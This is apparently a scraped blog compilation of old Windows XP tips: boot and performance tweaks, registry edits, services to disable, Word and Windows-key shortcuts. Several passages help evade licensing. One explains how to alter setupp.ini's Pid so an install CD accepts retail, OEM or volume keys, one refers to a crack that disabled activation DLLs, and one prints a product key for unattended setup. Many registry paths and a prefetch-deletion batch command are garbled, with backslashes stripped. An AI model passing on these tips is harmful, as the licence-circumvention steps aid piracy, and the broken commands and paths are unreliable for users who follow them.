  3343. Note that this command only works in XP Pro, not in XP Home. You can, however, type net statistics workstation at the prompt in Home. The first line will tell you the day and time that the system came online.
  3344. original from : http://www.the-cybers-skills.blogspot.com
  3345. Booting XP so Faster
  3346. Saturday, September 17, 2011 2:31 AM
  3347. First of all, this tweak only apply to those who only have one HDD on their primary IDE channel (nothing else on device 0 or 1) and a CD-ROM and/or DVD-ROM on the secondary IDE channel. Each time you boot Windows XP, there's an updated file called NTOSBOOT-*.pf who appears in your prefetch directory (%SystemRoot%Prefetch) and there's no need to erease any other files as the new prefetch option in XP really improves loading time of installed programs. We only want WindowsXP to boot faster and not decrease its performance. Thanks to Rod Cahoon (for the prefetch automation process...with a minor change of mine) and Zeb for the IDE Channel tweak as those two tricks, coupled together with a little modification, result in an EXTREMELY fast bootup:
  3348.  
  3349. 1. Open notepad.exe, type "del c:windowsprefetch tosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:
  3350.  
  3351. 2. From the Start menu, select "Run..." & type "gpedit.msc".
  3352.  
  3353. 3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
  3354.  
  3355. 4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
  3356.  
  3357. 5. Click "OK", "Apply" & "OK" once again to exit.
  3358.  
  3359. 6. From the Start menu, select "Run..." & type "devmgmt.msc".
  3360.  
  3361. 7. Double click on "IDE ATA/ATAPI controllers"
  3362.  
  3363. 8. Right click on "Primary IDE Channel" and select "Properties".
  3364.  
  3365. 9. Select the "Advanced Settings" tab then on the device 0 or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
  3366.  
  3367. 10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
  3368.  
  3369. 11. Reboot your computer.
  3370.  
  3371. WindowsXP should now boot REALLY faster.
  3372. original from : http://www.the-cybers-skills.blogspot.com
  3373. Add My own tips to Windows XP
  3374. Saturday, September 17, 2011 2:31 AM
  3375. Are you sick of seeing the same tips again and again when you first logon to Windows? Now you can change them to whatever you want, whether it's quotes, jokes or a to-do list, anything is possible.
  3376.  
  3377. Open your registry and find the key below.
  3378.  
  3379. HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Explorer\ Tips
  3380.  
  3381. Create a new string valued named by incrementing the existing value names and set it to the required tip text.
  3382. original from : http://www.the-cybers-skills.blogspot.com
  3383. How to make Windows XP go Faster
  3384. Saturday, September 17, 2011 2:31 AM
  3385. Services You Can Disable
  3386.  
  3387. There are quite a few services you can disable from starting automatically.
  3388. This would be to speed up your boot time and free resources.
  3389. They are only suggestions so I suggestion you read the description of each one when you run Services
  3390. and that you turn them off one at a time.
  3391.  
  3392. Some possibilities are:
  3393. Alerter
  3394. Application Management
  3395. Clipbook
  3396. Fast UserSwitching
  3397. Human Interface Devices
  3398. Indexing Service
  3399. Messenger
  3400. Net Logon
  3401. NetMeeting
  3402. QOS RSVP
  3403. Remote Desktop Help Session Manager
  3404. Remote Registry
  3405. Routing & Remote Access
  3406. SSDP Discovery Service
  3407. Universal Plug and Play Device Host
  3408. Web Client
  3409.  
  3410.  
  3411. --------------------------------------------------------------------------------
  3412.  
  3413. Cleaning the Prefetch Directory
  3414.  
  3415. WindowsXP has a new feature called Prefetch. This keeps a shortcut to recently used programs.
  3416. However it can fill up with old and obsolete programs.
  3417.  
  3418. To clean this periodically go to:
  3419.  
  3420. Star / Run / Prefetch
  3421. Press Ctrl-A to highlight all the shorcuts
  3422. Delete them
  3423.  
  3424. --------------------------------------------------------------------------------
  3425.  
  3426. Not Displaying Logon, Logoff, Startup and Shutdown Status Messages
  3427.  
  3428. To turn these off:
  3429.  
  3430. Start Regedit
  3431. Go to HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem
  3432. If it is not already there, create a DWORD value named DisableStatusMessages
  3433. Give it a value of 1
  3434.  
  3435. --------------------------------------------------------------------------------
  3436. Clearing the Page File on Shutdown
  3437.  
  3438. Click on the Start button
  3439. Go to the Control Panel
  3440. Administrative Tools
  3441. Local Security Policy
  3442. Local Policies
  3443. Click on Security Options
  3444. Right hand menu - right click on "Shutdown: Clear Virtual Memory Pagefile"
  3445. Select "Enable"
  3446. Reboot
  3447.  
  3448. For regedit users.....
  3449. If you want to clear the page file on each shutdown:
  3450.  
  3451. Start Regedit
  3452. Go to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory ManagementClearPageFileAtShutdown
  3453. Set the value to 1
  3454.  
  3455. --------------------------------------------------------------------------------
  3456.  
  3457. No GUI Boot
  3458.  
  3459. If you don't need to see the XP boot logo,
  3460.  
  3461. Run MSCONFIG
  3462. Click on the BOOT.INI tab
  3463. Check the box for /NOGUIBOOT
  3464.  
  3465. ---------------------------------------------------------------------------------
  3466. Speeding the Startup of Some CD Burner Programs
  3467.  
  3468. If you use program other than the native WindowsXP CD Burner software,
  3469. you might be able to increase the speed that it loads.
  3470.  
  3471. Go to Control Panel / Administrative Tools / Services
  3472. Double-click on IMAPI CD-Burning COM Service
  3473. For the Startup Type, select Disabled
  3474. Click on the OK button and then close the Services window
  3475. If you dont You should notice
  3476.  
  3477. --------------------------------------------------------------------------------
  3478.  
  3479. Getting Rid of Unread Email Messages
  3480.  
  3481. To remove the Unread Email message by user's login names:
  3482.  
  3483. Start Regedit
  3484. For a single user: Go to HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionUnreadMail
  3485. For all users: Go to HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUnreadMail
  3486. Create a DWORD key called MessageExpiryDays
  3487. Give it a value of 0
  3488.  
  3489. ------------------------------------------------------------------------------
  3490.  
  3491. Decreasing Boot Time
  3492.  
  3493. Microsoft has made available a program to analyze and decrease the time it takes to boot to WindowsXP
  3494. The program is called BootVis
  3495.  
  3496. Uncompress the file.
  3497. Run BOOTVIS.EXE
  3498. For a starting point, run Trace / Next Boot + Driver Delays
  3499. This will reboot your computer and provide a benchmark
  3500. After the reboot, BootVis will take a minute or two to show graphs of your system startup.
  3501. Note how much time it takes for your system to load (click on the red vertical line)
  3502. Then run Trace / Optimize System
  3503. Re-Run the Next Boot + Drive Delays
  3504. Note how much the time has decreased
  3505. Mine went from approximately 33 to 25 seconds.
  3506.  
  3507. --------------------------------------------------------------------------------
  3508. Increasing Graphics Performance
  3509.  
  3510. By default, WindowsXP turns on a lot of shadows, fades, slides etc to menu items.
  3511. Most simply slow down their display.
  3512.  
  3513. To turn these off selectively:
  3514.  
  3515. Right click on the My Computer icon
  3516. Select Properties
  3517. Click on the Advanced tab
  3518. Under Performance, click on the Settings button
  3519. To turn them all of, select Adjust for best performance
  3520. My preference is to leave them all off except for Show shadows under mouse pointer and Show window contents while dragging
  3521.  
  3522. ---------------------------------------------------------------------------
  3523.  
  3524. Increasing System Performance
  3525.  
  3526. If you have 512 megs or more of memory, you can increase system performance
  3527. by having the core system kept in memory.
  3528.  
  3529. Start Regedit
  3530. Go to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory ManagementDisablePagingExecutive
  3531. Set the value to be 1
  3532. Reboot the computer
  3533.  
  3534. ---------------------------------------------------------------------------
  3535.  
  3536. Increasing File System Caching
  3537.  
  3538. To increase the amount of memory Windows will locked for I/O operations:
  3539.  
  3540. Start Regedit
  3541. Go to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory Management
  3542. Edit the key IoPageLockLimit
  3543.  
  3544. -----------------------------------------------------------------------------
  3545.  
  3546. Resolving Inability to Add or Remove Programs
  3547.  
  3548. If a particular user cannot add or remove programs, there might be a simple registry edit neeed.
  3549.  
  3550. Go to HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall
  3551. Change the DWORD NoAddRemovePrograms to 0 disable it
  3552.  
  3553. 4096 - 32megs of memory or less
  3554. 8192 - 32+ megs of memory
  3555. 16384 - 64+ megs of memory
  3556. 32768 - 128+ megs of memory
  3557. 65536 - 256+ megs of memory
  3558. original from : http://www.the-cybers-skills.blogspot.com
  3559. Keyboard Shortcuts, Microsoft Word
  3560. Saturday, December 04, 2010 7:16 PM
  3561. Keyboard Shortcuts Result in Microsoft Word
  3562.  
  3563. CTRL and A Selects all in the current document.
  3564. CTRL and B Bold text.
  3565. CTRL and C Copies the item or text to the Clipboard and can be pasted using CTRL and V.
  3566. CTRL and D Displays the Font dialogue box.
  3567. CTRL and E Centre Alignment.
  3568. CTRL and F Displays the Find dialog box, to search the current document.
  3569. CTRL and G Displays the Go to dialog box, to go to a specific location in the current document.
  3570. CTRL and H Displays the Replace dialogue box.
  3571. CTRL and I Italic text.
  3572. CTRL and J Full Justification.
  3573. CTRL and K Create Hyperlink
  3574. CTRL and L Left Alignment
  3575. CTRL and M Tab
  3576. CTRL and N Creates a new document.
  3577. CTRL and O Displays the Open File dialogue box.
  3578. CTRL and P Displays the Print dialog box.
  3579. CTRL and R Right Alignment.
  3580. CTRL and S Displays the Save dialog box.
  3581. CTRL and U Underline text
  3582. CTRL and V Pastes the copied item or text from the Clipboard into the current position in the document.
  3583. CTRL and X Cuts the item or text selected to the Clipboard.
  3584. CTRL and Y Redo the last undone action.
  3585. CTRL and Z Undoes the last action.
  3586. CTRL and ENTER Insert Page Break.
  3587. CTRL and F2 Show Print preview.
  3588. CTRL and F4 Closes the active document window.
  3589. CTRL and F6 Opens the next document window.
  3590.  
  3591. Keyboard Shortcuts Result in Microsoft Word
  3592. F1 key Get help or use the Office assistant.
  3593. SHIFT and F1 Key Context sensitive help.
  3594. F2 Key Move text or image.
  3595. SHIFT and F2 Key Copy Text.
  3596. F3 Key Insert an autotext entry.
  3597. SHIFT and F3 Key Change the case of the selected text.
  3598. F4 Key Perform last action again.
  3599. SHIFT and F4 Key Perform a Find or Go to action again.
  3600. F5 Key Displays the Go to dialogue box, from here you can also Find and Replace.
  3601. SHIFT and F5 Key Move to a previous revision.
  3602. F6 Key Go to the next frame or pane.
  3603. SHIFT and F6 Key Go to the previous frame or pane.
  3604. F7 Key Launch the Spell checker.
  3605. SHIFT and F7 Key Launch the Thesaurus.
  3606. F8 Key Extend the current selection.
  3607. SHIFT and F8 Key Shrink the current selection.
  3608. F9 Key Update the selected fields.
  3609. SHIFT and F9 Key Switch between a field code and it's result.
  3610. F10 Key Activate the menu bar.
  3611. SHIFT and F10 Key Display a Shortcut Menu. Same as right clicking.
  3612. F11 Key Go to the next field.
  3613. SHIFT and F11 Key Go to the previous field.
  3614. F12 Key Save file As, equivalent to tools menu.
  3615. SHIFT and F12 Key Save document, equivalent to tools menu
  3616. original from : http://www.the-cybers-skills.blogspot.com
  3617. Windows XP tips and tricks
  3618. Saturday, December 04, 2010 7:17 PM
  3619. Windows Xp Tips 'n' Tricks, Windows XP Tips 'n' Tricks
  3620.  
  3621. Please note that some of these tips require you to use a Registry Editor (regedit.exe), which could render your system unusable. Thus, none of these tips are supported in any way: Use them at your own risk. Also note that most of these tips will require you to be logged on with Administrative rights.
  3622.  
  3623. Unlocking WinXP's setupp.ini
  3624. ============================
  3625.  
  3626.  
  3627. WinXP's setupp.ini controls how the CD acts. IE is it an OEM version or retail? First, find your setupp.ini file in the i386 directory on your WinXP CD. Open it up, it'll look something like this:
  3628.  
  3629. ExtraData=707A667567736F696F697911AE7E05
  3630. Pid=55034000
  3631.  
  3632. The Pid value is what we're interested in. What's there now looks like a standard default. There are special numbers that determine if it's a retail, oem, or volume license edition. First, we break down that number into two parts. The first five digits determines how the CD will behave, ie is it a retail cd that lets you clean install or upgrade, or an oem cd that only lets you perform a clean install? The last three digits determines what CD key it will accept. You are able to mix and match these values. For example you could make a WinXP cd that acted like a retail cd, yet accepted OEM keys.
  3633.  
  3634. Now, for the actual values. Remember the first and last values are interchangable, but usually you'd keep them as a pair:
  3635.  
  3636. Retail = 51882 335
  3637. Volume License = 51883 270
  3638. OEM = 82503 OEM
  3639.  
  3640. So if you wanted a retail CD that took retail keys, the last line of your setupp.ini file would read:
  3641.  
  3642. Pid=51882335
  3643.  
  3644. And if you wanted a retail CD that took OEM keys, you'd use:
  3645.  
  3646. Pid=51882OEM
  3647.  
  3648.  
  3649.  
  3650. How do I get the "Administrator" name on Welcome Screen?
  3651. ========================================================
  3652.  
  3653. To get Admin account on the "Welcome Screen" as well as the other usernames, make sure that there are no accounts logged in.
  3654.  
  3655. Press "ctrl-alt-del" twice and you should be able to login as administrator!
  3656.  
  3657. finally worked for me after i found out that all accounts have to be logged out first
  3658.  
  3659.  
  3660.  
  3661. Fix Movie Inteferance in AVI files
  3662. ==================================
  3663.  
  3664. If you have any AVI files that you saved in Windows 9x, which have interference when opened in Windows XP, there is an easy fix to get rid of the interference:
  3665.  
  3666. Open Windows Movie Maker.
  3667. Click View and then click Options.
  3668. Click in the box to remove the check mark beside Automatically create clips.
  3669.  
  3670. Now, import the movie file that has interference and drag it onto the timeline. Then save the movie, and during the rerendering, the interference will be removed.
  3671.  
  3672.  
  3673.  
  3674. Create a Password Reset Disk
  3675. ============================
  3676.  
  3677. If you’re running Windows XP Professional as a local user in a workgroup environment, you can create a password reset disk to log onto your computer when you forget your password. To create the disk:
  3678.  
  3679. Click Start, click Control Panel, and then click User Accounts.
  3680. Click your account name.
  3681. Under Related Tasks, click Prevent a forgotten password.
  3682.  
  3683. Follow the directions in the Forgotten Password Wizard to create a password reset disk.
  3684.  
  3685. Store the disk in a secure location, because anyone using it can access your local user account
  3686.  
  3687.  
  3688.  
  3689. Change Web Page Font Size on the Fly
  3690. ====================================
  3691.  
  3692. If your mouse contains a wheel for scrolling, you can change font size on the fly when viewing a Web page. To do so:
  3693.  
  3694. Press and hold Ctrl. Scroll down (or towards yourself) to enlarge the font size. Scroll up (or away from yourself) to reduce the font size.
  3695.  
  3696. You might find it useful to reduce font size when printing a Web page, so that you can fit more content on the page.
  3697.  
  3698.  
  3699. WinXP Clear Page file on shutdown
  3700. =================================
  3701.  
  3702. WINXPCPS.REG (WinXP Clear Page file on shutdown)
  3703.  
  3704. This Registration (.REG) file clears the Page file when you power off the computer.
  3705. Restart Windows for these changes to take effect!
  3706. ALWAYS BACKUP YOUR SYSTEM BEFORE MAKING ANY CHANGES!
  3707.  
  3708. Browse to: HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \ Session Manager \ Memory Management
  3709.  
  3710. and add the DWORD variable "ClearPageFileAtShutdown"=dword:00000001
  3711.  
  3712. You can also do this without reg hacking.
  3713. Go to Control panel Administartative tools, local security policy. then goto local policies ---> security options.
  3714. Then change the option for "Shutdown: Clear Virtual Memory Pagefile"
  3715.  
  3716.  
  3717. Group Policy for Windows XP
  3718. ===========================
  3719.  
  3720. One of the most full featured Windows XP configuration tools available is hidden right there in your system, but most people don't even know it exists. It's called the Local Group Policy Editor, or gpedit for short. To invoke this editor, select Start and then Run, then type the following:
  3721.  
  3722. gpedit.msc
  3723.  
  3724. After you hit ENTER, you'll be greeted by gpedit, which lets you modify virtually every feature in Windows XP without having to resort to regedit. Dig around and enjoy!
  3725.  
  3726.  
  3727. Forgetting What Your Files Are?
  3728. ===============================
  3729.  
  3730. This procedure works under NTFS.
  3731.  
  3732. As times goes along you have a lot files on your computer. You are going to forget what they are. Well here is way to identify them as you scroll through Windows Explorer in the future.
  3733.  
  3734. This procedure works under NTFS.
  3735.  
  3736. 1.. Open up a folder on your system that you want to keep track of the different files you might one to identify in the future.
  3737.  
  3738. 2.. Under View make certain that you set it to the Details.
  3739.  
  3740. 3.. Highlight the file you want to keep more information on. Right click the file and you will get a pop up menu. Click on properties.
  3741.  
  3742. 4.. Click on the Summary Tab (make sure it says simple not advanced on the button in the box), You should now get the following fields,
  3743.  
  3744. Title,Subject, Author, Category, Keywords, Comments
  3745.  
  3746. You will see advanced also if you have changed it to simple, Here will be other fields you can fill in.
  3747.  
  3748. 5.. Next you can fill in what ever field you want.
  3749.  
  3750. 6.. After you finished click the apply button then OK.
  3751.  
  3752. 7.. Next right click the bar above your files, under the address barand you should get a drop down menu. Here you can click the fields you want to display.
  3753.  
  3754. 8.. You should now see a list with the new fields and any comments you have done.
  3755.  
  3756. 9.. Now if you want to sort these just right click a blank spot and then you sort the information to your liking.
  3757.  
  3758.  
  3759. Temporarily Assign Yourself Administrative Permissions
  3760. ======================================================
  3761.  
  3762. Many programs require you to have Administrative permissions to be able to install them. Here is an easy way to temporarily assign yourself Administrative permissions while you remain logged in as a normal user.
  3763.  
  3764. Hold down the Shift key as you right-click on the program’s setup file.
  3765.  
  3766. Click Run as.
  3767.  
  3768. Type in a username and password that have Administrative permissions.
  3769.  
  3770. This will also work on applications in the Start menu.
  3771.  
  3772.  
  3773. Create a Shortcut to Lock Your Computer
  3774. =======================================
  3775.  
  3776. Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screensaver.
  3777.  
  3778. To create a shortcut on your desktop to lock your computer:
  3779.  
  3780. Right-click the desktop.
  3781. Point to New, and then click Shortcut.
  3782.  
  3783. The Create Shortcut Wizard opens. In the text box, type the following:
  3784. rundll32.exe user32.dll,LockWorkStation
  3785.  
  3786. Click Next.
  3787.  
  3788. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like.
  3789.  
  3790. Click Finish.
  3791.  
  3792. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll).
  3793.  
  3794. To change the icon:
  3795.  
  3796. Right click the shortcut and then select Properties.
  3797. Click the Shortcut tab, and then click the Change Icon button.
  3798.  
  3799. In the Look for icons in this file text box, type:
  3800. Shell32.dll.
  3801.  
  3802. Click OK.
  3803.  
  3804. Select one of the icons from the list and then click OK
  3805.  
  3806. You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.
  3807.  
  3808.  
  3809.  
  3810. Create a Shortcut to Start Remote Desktop
  3811. =========================================
  3812.  
  3813. Tip: You can add a shortcut to the desktop of your home computer to quickly start Remote Desktop and connect to your office computer.
  3814.  
  3815. To create a shortcut icon to start Remote Desktop
  3816.  
  3817. Click Start, point to More Programs, point to Accessories, point to Communications, and then click on Remote Desktop Connection.
  3818.  
  3819. Click Options.
  3820.  
  3821. Configure settings for the connection to your office computer.
  3822.  
  3823. Click Save As, and enter a name, such as Office Computer. Click Save.
  3824.  
  3825. Open the Remote Desktops folder.
  3826.  
  3827. Right-click on the file named Office Computer, and then click Create Shortcut.
  3828.  
  3829. Drag the shortcut onto the desktop of your home computer.
  3830.  
  3831. To start Remote Desktop and connect to your office computer, double-click on the shortcut
  3832.  
  3833.  
  3834. Instantly Activate a Screensaver
  3835. ================================
  3836.  
  3837. Turn on a screensaver without having to wait by adding a shortcut to your desktop:
  3838.  
  3839. Click the Start button, and then click Search.
  3840. In the Search Companion window, click All file types.
  3841.  
  3842. In the file name box, type *.scr
  3843.  
  3844. In the Look in box, choose Local Hard Drives (C or the drive where you have system files stored on your computer.
  3845.  
  3846. Click Search.
  3847.  
  3848. You will see a list of screensavers in the results. Pick a screensaver you want. You can preview it by double-clicking it.
  3849.  
  3850. Right click on the file, choose Send To, and then click Desktop (create shortcut).
  3851.  
  3852. To activate the screensaver, double-click the icon on your desktop
  3853.  
  3854.  
  3855. Add a Map Drive Button to the Toolbar
  3856. =====================================
  3857.  
  3858. Do you want to quickly map a drive, but can’t find the toolbar button? If you map drives often, use one of these options to add a Map Drive button to the folder toolbar.
  3859.  
  3860. Option One (Long Term Fix)
  3861.  
  3862. Click Start, click My Computer, right-click the toolbar, then unlock the toolbars, if necessary.
  3863.  
  3864. Right-click the toolbar again, and then click Customize.
  3865.  
  3866. Under Available toolbar buttons, locate Map Drive, and drag it into the position you want on the right under Current toolbar buttons.
  3867.  
  3868. Click Close, click OK, and then click OK again.
  3869.  
  3870. You now have drive mapping buttons on your toolbar, so you can map drives from any folder window. To unmap drives, follow the above procedure, selecting Disconnect under Available toolbar buttons. To quickly map a drive, try this option.
  3871.  
  3872. Option Two (Quick Fix)
  3873.  
  3874. Click Start, and right-click My Computer.
  3875. Click Map Network Drive.
  3876.  
  3877. If you place your My Computer icon directly on the desktop, you can make this move in only two clicks!
  3878.  
  3879.  
  3880. Software not installing?
  3881. ========================
  3882.  
  3883. If you have a piece of software that refuses to install because it says that you are not running Windows 2000 (such as the Win2K drivers for a Mustek scanner!!) you can simply edit HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/ProductName to say Microsoft Windows 2000 instead of XP and it will install. You may also have to edit the version number or build number, depending on how hard the program tries to verify that you are installing on the correct OS. I had to do this for my Mustek 600 CP scanner (compatibility mode didn''t help!!!) and it worked great, so I now have my scanner working with XP (and a tech at Mustek can now eat his words).
  3884.  
  3885. BTW, don''t forget to restore any changes you make after you get your software installed
  3886.  
  3887. You do this at your own risk.
  3888.  
  3889.  
  3890. Use your Windows Key
  3891. ====================
  3892.  
  3893. The Windows logo key, located in the bottom row of most computer keyboards is a little-used treasure. Don''t ignore it. It is the shortcut anchor for the following commands:
  3894.  
  3895. Windows: Display the Start menu
  3896. Windows + D: Minimize or restore all windows
  3897. Windows + E: Display Windows Explorer
  3898. Windows + F: Display Search for files
  3899. Windows + Ctrl + F: Display Search for computer
  3900. Windows + F1: Display Help and Support Center
  3901. Windows + R: Display Run dialog box
  3902. Windows + break: Display System Properties dialog box
  3903. Windows + shift + M: Undo minimize all windows
  3904. Windows + L: Lock the workstation
  3905. Windows + U: Open Utility Manager
  3906. Windows + Q: Quick switching of users (Powertoys only)
  3907. Windows + Q: Hold Windows Key, then tap Q to scroll thru the different users on your pc
  3908.  
  3909.  
  3910.  
  3911. Change your cd key
  3912. ==================
  3913.  
  3914. You don't need to re-install if you want to try the key out ... just do this:
  3915.  
  3916. 1. Go to Activate Windows
  3917. 2. Select the Telephone option
  3918. 3. Click "Change Product Key"
  3919. 4. Enter NOT ALLOWED ~ Zabref
  3920. 5. Click "Update"
  3921.  
  3922. Now log off and log back in again. It should now show 60 days left, minus the number of days it had already counted down.
  3923.  
  3924. Note: If your crack de-activated REGWIZC.DLL and LICDLL.DLL, you are going to have to re-register them.
  3925.  
  3926.  
  3927.  
  3928. Remove the Shared Documents folders from My Computer
  3929. ====================================================
  3930.  
  3931. One of the most annoying things about the new Windows XP user interface is that Microsoft saw fit to provide links to all of the Shared Documents folders on your system, right at the top of the My Computer window. I can't imagine why this would be the default, even in a shared PC environment at home, but what's even more annoying is that you cannot change this behavior through the sh*ll
  3932. : Those icons are stuck there and you have to live with it.
  3933. Until now, that is.
  3934.  
  3935. Simply fire up the Registry Editor and navigate to the following key:
  3936. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ My Computer \ NameSpace \ DelegateFolders
  3937.  
  3938. You'll see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. If you delete this, all of the Shared Documents folders (which are normally under the group called "Other Files Stored on This Computer" will be gone.
  3939.  
  3940. You do not need to reboot your system to see the change.
  3941.  
  3942.  
  3943. Before: A cluttered mess with icons no one will ever use (especially that orpaned one). After: Simplicity itself, and the way it should be by default.
  3944.  
  3945.  
  3946. This tip For older XP builds
  3947. ===================
  3948.  
  3949. Edit or remove the "Comments" link in window title bars
  3950.  
  3951. During the Windows XP beta, Microsoft has added a "Comments?" hyperlink to the title bar of each window in the system so that beta testers can more easily send in a problem report about the user interface. But for most of us, this isn't an issue, and the Comments link is simply a visual distraction. And for many programs that alter the title bar, the Comments link renders the Minimize, Maximize, and Close window buttons unusable, so it's actually a problem.
  3952. Let's get rid of it. Or, if you're into this kind of thing, you can edit it too.
  3953.  
  3954. Open the Registry Editor and navigate to the following keys:
  3955. My Computer \ HKEY_CURRENT_USER \ Control Panel \ Desktop \ LameButtonEnabled
  3956. My Computer \ HKEY_CURRENT_USER \ Control Panel \ Desktop \ LameButtonText
  3957.  
  3958. The first key determines whether the link appears at all; change its value to 0 to turn it off. The second key lets you have a little fun with the hyperlink; you can change the text to anything you'd like, such as "Paul Thurrott" or whatever.
  3959.  
  3960. Editing either value requires a restart before the changes take effect.
  3961.  
  3962.  
  3963. Before: An unnecessary hyperlink. Have some fun with it! Or just remove it entirely. It's up to you.
  3964.  
  3965.  
  3966.  
  3967. Rip high-quality MP3s in Windows Media Player 8
  3968. ================================================
  3969.  
  3970. The relationship between Windows Media Player 8 and the MP3 audio format is widely misunderstood. Basically, WMP8 will be able to playback MP3 files, but encoding (or "ripping" CD audio into MP3 format will require an MP3 plug-in. So during the Windows XP beta, Microsoft is supplying a sample MP3 plug-in for testing purposes, but it's limited to 56 Kbps rips, which is pretty useless. However, if you have an externally installed MP3 codec, you can use WMP8 to rip at higher bit rates. But you'll have to edit the Registry to make this work.
  3971. Fire up the Registry Editor and navigate to the following key:
  3972. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ MediaPlayer \ Settings \ MP3Encoding
  3973.  
  3974. Here, you'll see sub-keys for LowRate and LowRateSample, which of course equates to the single 56 Kbps sample rate you see in WMP8. To get better sampling rates, try adding the following keys (Using New then DWORD value):
  3975.  
  3976. "LowRate" = DWORD value of 0000dac0
  3977. "MediumRate" = DWORD value of 0000fa00
  3978. "MediumHighRate" = DWORD value of 0001f400
  3979. "HighRate" = DWORD value of 0002ee00
  3980.  
  3981. Now, when you launch WMP8 and go into Tools, then Options, then Copy Music, you will have four encoding choices for MP3: 56 Kbps, 64 Kbps, 128 Kbps, and 192 Kbps. Note that you will not get higher bit rate encoding unless you have installed an MP3 codec separately; the version in Windows Media Player 8 is limited to 56 Kbps only.
  3982.  
  3983.  
  3984. Find the appropriate location in the Registry... ...add a few DWORD values... ...And then you'll be ripping CDs in higher-quality MP3 format!
  3985.  
  3986.  
  3987.  
  3988. Speed up the Start Menu
  3989. =======================
  3990.  
  3991. The default speed of the Start Menu is pretty slow, but you can fix that by editing a Registry Key. Fire up the Registry Editor and navigate to the following key:
  3992. HKEY_CURRENT_USER \ Control Panel \ Desktop \ MenuShowDelay
  3993.  
  3994. By default, the value is 400. Change this to a smaller value, such as 0, to speed it up.
  3995.  
  3996.  
  3997.  
  3998. Speed up the Start Menu (Part two)
  3999. ==================================
  4000.  
  4001. If your confounded by the slow speed of the Start Menu, even after using the tip above, then you might try the following: Navigate to Display Properties then Appearance then Advanced and turn off the option titled Show menu shadow . You will get much better overall performance.
  4002.  
  4003.  
  4004.  
  4005. Speed up Internet Explorer 6 Favorites
  4006. ======================================
  4007.  
  4008. For some reason, the Favorites menu in IE 6 seems to slow down dramatically sometimes--I've noticed this happens when you install Tweak UI 1.33, for example, and when you use the preview tip to speed up the Start menu. But here's a fix for the problem that does work, though it's unclear why:
  4009. Just open a command line window (Start button -> Run -> cmd) and type sfc, then hit ENTER. This command line runs the System File Checker, which performs a number of services, all of which are completely unrelated to IE 6. But there you go: It works.
  4010.  
  4011.  
  4012. Do an unattended installation
  4013. =============================
  4014.  
  4015. The Windows XP Setup routine is much nicer than that in Windows 2000 or Windows Me, but it's still an hour-long process that forces you to sit in front of your computer for an hour, answering dialog boxes and typing in product keys. But Windows XP picks up one of the more useful features from Windows 2000, the ability to do an unattended installation, so you can simply prepare a script that will answer all those dialogs for you and let you spend some quality time with your family.
  4016. I've written about Windows 2000 unattended installations and the process is pretty much identical on Windows XP, so please read that article carefully before proceeding. And you need to be aware that this feature is designed for a standalone Windows XP system: If you want to dual-boot Windows XP with another OS, you're going to have to go through the interactive Setup just like everyone else: An unattended install will wipe out your hard drive and install only Windows XP, usually.
  4017.  
  4018. To perform an unattended installation, you just need to work with the Setup Manager, which is located on the Windows XP CD-ROM in D:\SupportTools\DEPLOY.CAB by default: Extract the contents of this file and you'll find a number of useful tools and help files; the one we're interested in is named setupmgr.exe. This is a very simple wizard application that will walk you through the process of creating an answer file called winnt.sif that can be used to guide Windows XP Setup through the unattended installation.
  4019.  
  4020. One final tip: There's one thing that Setup Manager doesn't add: Your product key. However, you can add this to the unattend.txt file manually. Simply open the file in Notepad and add the following line under the [UserData] section:
  4021.  
  4022. ProductID=RK7J8-2PGYQ-P47VV-V6PMB-F6XPQ
  4023.  
  4024. (This is a 60 day cd key)
  4025.  
  4026. Then, just copy winnt.sif to a floppy, put your Windows XP CD-ROM in the CD drive, and reboot: When the CD auto-boots, it will look for the unattend.txt file in A: automatically, and use it to answer the Setup questions if it's there.
  4027.  
  4028. Finally, please remember that this will wipe out your system! Back up first, and spend some time with the help files in DEPLOY.CAB before proceeding.
  4029.  
  4030.  
  4031. For Older builds or not using setupreg.hiv file
  4032. ===============================================
  4033.  
  4034. Remove the Desktop version text
  4035.  
  4036. During the Windows XP beta, you will see text in the lower right corner of the screen that says Windows XP Professional, Evaluation Copy. Build 2462 or similar. A lot of people would like to remove this text for some reason, and while it's possible to do so, the cure is more damaging than the problem, in my opinion. So the following step will remove this text, but you'll lose a lot of the nice graphical effects that come in Windows XP, such as the see-through icon text.
  4037.  
  4038. To remove the desktop version text, open Display Properties (right-click the desktop, then choose Properties) and navigate to the Desktop page. Click Customize Desktop and then choose the Web page in the resulting dialog. On this page, check the option titled Lock desktop items. Click OK to close the dialog, and then OK to close Display Properties. The text disappears. But now the rest of your system is really ugly. You can reverse the process by unchecking Lock desktop items.
  4039.  
  4040. There's also a shortcut for this process: Just right-click the desktop and choose Arrange by then Lock Web Icons on the Desktop.
  4041.  
  4042.  
  4043. --------------------------------------------------------------------------------
  4044. Enable ClearType on the Welcome Screen!
  4045. =======================================
  4046.  
